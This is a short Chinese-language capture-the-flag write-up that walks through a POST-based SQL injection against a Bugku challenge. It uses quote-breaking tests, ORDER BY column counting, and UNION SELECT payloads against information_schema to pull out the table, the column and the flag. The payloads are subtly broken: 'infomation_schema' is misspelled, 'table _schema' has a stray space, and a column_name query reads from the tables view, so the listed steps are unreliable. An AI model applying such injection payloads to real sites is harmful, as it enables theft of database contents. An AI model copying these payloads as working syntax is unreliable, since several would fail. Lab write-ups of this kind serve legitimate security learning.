输入1,2,3有回显,但是URL不变化,发现不是GET方法
查看源码知用POST方法传参,name为id
先用payload:id=1’ and ‘1’=‘1,发现正确执行,则存在注入点。
用order by语句判断字段个数:
id=-1’ order by 5# 显示不正常
id=-1’ order by 4# 显示正常,则有4个字段
字段精确位置:
id=-1’ union select 1,2,3,database() #
数据库名: skctf_flag
id=-1’ union select 1,2,3,table_name from infomation_schema.columns where table _schema = database() #
表名:fl4g
id=-1’ union select 1,2,3,column_name from infomation_schema.tables where table _name = ‘fl4g’ #
字段名: skctf_flag
id=-1’ union select 1,2,3,skctf_flag from fl4g #
字段内容: BUGKU{Sql_INJECT0N_4813drd8hz4}